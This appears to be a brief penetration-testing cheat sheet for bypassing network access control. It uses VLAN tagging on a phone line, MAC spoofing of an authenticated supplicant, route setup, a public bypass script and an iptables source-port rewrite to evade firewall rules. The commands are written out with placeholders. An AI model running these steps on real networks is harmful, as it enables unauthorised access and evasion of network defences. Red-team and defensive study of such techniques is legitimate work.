NAC Bypass

Network access

NAC bypass scenario with VLAN tagging on a phone

upstream = interface connected to the switch = eth0.

phy = interface connected to supplicant = eth1.

------------ only once
modprobe br_netfilter
modprobe 8021q
----------- activate packet tagging
ifconfig eth1 down
ifconfig br0 down
vconfig add eth0 <VLAN_number>
ip addr add <192.168.190.0/24> dev eth0.101
macchanger -m <supplicant_MAC> eth0
ifconfig eth0.101 up
route add default gw <gw_ip>
------------- cleaning
ifconfig eth0.101 down 
macchanger -p eth0
ifconfig eth1 up

info

If possible hardcode the 3 parameters in the script.

https://github.com/scipag/nac_bypass

./nac_bypass_setup.sh -1 eth0 -2 eth1

And modify the source port for all packets in order to bypass the firewall policy. Take the source port used for device administration for example.

iptables -t nat -I POSTROUTING -p tcp -m tcp -j MASQUERADE --to-ports <22>

Network access​

NAC bypass scenario with VLAN tagging on a phone​

Network access

NAC bypass scenario with VLAN tagging on a phone